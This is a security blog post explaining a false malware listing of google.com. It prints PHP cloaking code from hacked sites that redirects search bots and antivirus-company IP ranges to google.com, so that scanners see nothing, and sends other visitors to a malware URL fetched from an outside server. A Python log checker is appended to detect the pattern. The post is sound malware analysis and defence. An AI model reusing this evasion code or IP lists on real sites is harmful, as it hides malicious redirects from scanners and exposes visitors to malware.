Flagging google.com as malware

Yesterday we listed www.google.com as being used for .htaccess conditional redirections on hacked sites. Google does no evil, so what happened?

We identified the source of the malware: it looks for certain user agents and IP addresses and redirects to www.google.com if the request comes from one of them, or to the real malware if not.

This is the code:

$is_bot = FALSE ;
$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#Safari#i', 
'#HTTrack#i', '#Chrome#i', '#Mac#i', '#IDBot#i', '#Indy\s*Library#',  '#ListChecker#i', 
'#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
..
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i' ) ; 

$stop_ips_masks = array(
        "66\.249\.[6-9][0-9]\.[0-9]+",    // Google    NetRange:   66.249.64.0 - 66.249.95.255
        "74\.125\.[0-9]+\.[0-9]+",        // Google     NetRange:   74.125.0.0 - 74.125.255.255
        "65\.5[2-5]\.[0-9]+\.[0-9]+",    // MSN        NetRange:   65.52.0.0 - 65.55.255.255,
        "74\.6\.[0-9]+\.[0-9]+",        // Yahoo    NetRange:   74.6.0.0 - 74.6.255.255
        "67\.195\.[0-9]+\.[0-9]+",        // Yahoo#2    NetRange:   67.195.0.0 - 67.195.255.255
        "72\.30\.[0-9]+\.[0-9]+",        // Yahoo#3    NetRange:   72.30.0.0 - 72.30.255.255
        "38\.[0-9]+\.[0-9]+\.[0-9]+",     // Cuill:     NetRange:   38.0.0.0 - 38.255.255.255
        "93\.172\.94\.227",                // MacFinder
        "212\.100\.250\.218",            // Wells Search II
        "71\.165\.223\.134", 
        "70\.91\.180\.25",
        "65\.93\.62\.242",
        "74\.193\.246\.129",
        "193\.164\.202\.166",
        "213\.144\.15\.38",
        "195\.92\.229\.2",
        "70\.50\.189\.191",
        "218\.28\.88\.99",
        "165\.160\.2\.20",
        "89\.122\.224\.230",
        "66\.230\.175\.124",
        "218\.18\.174\.27",
        "65\.33\.87\.94",
        "67\.210\.111\.241",
        "81\.135\.175\.70",
        "64\.69\.34\.134",
        "89\.149\.253\.169",
        "77\.193\.236\.225",
        "84\.155\.170\.196",
        "69\.174\.58\.36",
        "128\.103\.64\.[0-9]+",  // StopBadWare
        "150\.70\.[0-9]+\.[0-9]+",  // TrendMicro
        "216\.104\.[0-9]+\.[0-9]+",  // TrendMicro
        "207\.46\.[0-9]+\.[0-9]+",  // Microsoft
        "157\.55\.[0-9]+\.[0-9]+",  // Microsoft
        "213\.180\.[0-9]+\.[0-9]+",  // Yandex
        "217\.23\.[0-9]+\.[0-9]+",  // Kaspersky
        "91\.103\.64\.[0-9]+",  // Kaspersky
        "215\.5\.80\.[0-9]+",  // Kaspersky
        "195\.168\.53\.[0-9]+",  // NOD32
        "117\.198\.48\.54",
        "110\.77\.248\.135",
        "87\.255\.51\.229",
        "206\.248\.243\.130",
        "124\.115\.6\.[0-9]+",
        "170\.252\.248\.[0-9]+",
        "217\.95\.225\.[0-9]+",
        "203\.17\.34\.[0-9]+",
        "220\.255\.1\.[0-9]+", // domain-tool.com
        "69\.28\.58\.[0-9]+",  // Symantec
        "66\.231\.252\.[0-9]+",
        "126\.15\.99\.[0-9]+",
        "209\.128\.28\.[0-9]+",
        "91\.32\.55\.[0-9]+",
        "208\.72\.12\.[0-9]+",
        "84\.136\.88\.[0-9]+",
        "206\.80\.114\.[0-9]+",
        "24\.4\.75\.135",
        "66\.147\.244\.[0-9]+", // freepcsecurity.co.uk
        "128\.111\.48\.[0-9]+", // wepawet.cs.ucsb.edu
        "209\.9\.239\.[0-9]+", // jsunpack.jeek.org
        "62\.67\.194\.[0-9]+", // support.clean-mx.de
        "195\.214\.79\.[0-9]+", // support.clean-mx.de
        "97\.74\.141\.[0-9]+", // malwareurl.com
        "213\.171\.194\.[0-9]+", // spamhaus
        "139\.146\.167\.[0-9]+", // malwaredomains
        "88\.160\.229\.[0-9]+", // malwaredomains
        "69\.162\.79\.[0-9]+", // malwarebytes
        "66\.40\.145\.[0-9]+", // bitdefender
        "66\.223\.50\.[0-9]+", // bitdefender
        "204\.14\.90\.[0-9]+", // spywarewarrior.com
        "92\.123\.155\.[0-9]+", // Sophos
        "213\.31\.172\.[0-9]+", // Sophos
        "143\.215\.130\.[0-9]+", // Malwaredomainlist
        "150\.70\.172\.[0-9]+", // TrendNet
        "64\.88\.164\.[0-9]+", // AVG
        "102\.157\.192\.[0-9]+", // ZeusTracker
        "109\.65\.41\.[0-9]+", // ZeusTracker
        "110\.77\.248\.[0-9]+", // Virustotal
        "59\.6\.145\.[0-9]+", // Virustotal
        "67\.124\.37\.[0-9]+", // Virustotal
        "80\.190\.117\.[0-9]+", // Virustotal
        "202\.190\.74\.[0-9]+", // Virustotal
        "209\.160\.33\.[0-9]+", // Virustotal
        "91\.121\.139\.[0-9]+", // Virustotal
        "85\.87\.104\.[0-9]+", // Virustotal
        "96\.50\.0\.[0-9]+", // Virustotal
        "220\.225\.0\.52"
    );

foreach ( $stop_ips_masks as $k=>$v )
{
    if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) )
        $is_bot = TRUE ;
}
if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) )
{

header("Location: http://www.google.com/");
die();
}

So, if you are not familiar with PHP, what this code is doing is checking for the user agent of some bots (Googlebot, MSN, Bing, etc.) and for a few IP addresses of bots and antivirus companies (Trend, Bitdefender, etc.). If the request is coming from one of them, the script ignores the connection and redirects to www.google.com.

That's why we were seeing www.google.com and listed it on our malware dump (already fixed).

For all the other users (the victims), the malware was contacting http://88.198.28.38/api.php?action=link to get the URL to redirect (generally in the .tk domain). Any questions, let us know.
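A defender-side check for this behavior, added here as an example and not part of the original post: it parses web-server access log lines and flags any path that answers some clients with a redirect to the decoy (www.google.com) and other clients with a redirect to a different host. It assumes the log format appends the response's Location header as a final quoted field (Apache's %{Location}o); the log lines, IP addresses and the payload hostname below are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Combined log format plus a trailing quoted Location header (Apache %{Location}o).
# This extra field is an assumption of the example, not something the post shows.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" "(?P<location>[^"]*)"$'
)

# Constructed sample lines: a crawler and a Safari user get the decoy redirect,
# a Firefox user is sent to the real payload host, and one request is not a redirect.
SAMPLE_LOG = """\
66.249.66.1 - - [10/Mar/2011:10:00:01 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "http://www.google.com/"
198.51.100.2 - - [10/Mar/2011:10:00:05 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh) Safari/533.4" "http://www.google.com/"
203.0.113.7 - - [10/Mar/2011:10:00:09 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6" "http://example-payload.tk/in.php"
203.0.113.9 - - [10/Mar/2011:10:00:12 +0000] "GET /about.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6" "-"
"""

def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def redirect_targets(log_text):
    """Map each requested path to the set of hosts its 3xx responses pointed to."""
    targets = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["status"].startswith("3") or rec["location"] == "-":
            continue
        targets[rec["path"]].add(urlsplit(rec["location"]).hostname)
    return targets

def find_cloaking(log_text, decoy_hosts=("www.google.com",)):
    """Flag paths that redirect some clients to a decoy host and the rest elsewhere."""
    decoys = set(decoy_hosts)
    findings = {}
    for path, hosts in redirect_targets(log_text).items():
        # One path redirecting everyone to one place is ordinary; the same path
        # mixing the decoy with another host is the conditional-redirect pattern.
        if hosts & decoys and hosts - decoys:
            findings[path] = sorted(hosts - decoys)
    return findings

if __name__ == "__main__":
    for path, hosts in find_cloaking(SAMPLE_LOG).items():
        print(f"{path}: decoy redirect for some clients, others sent to {hosts}")
```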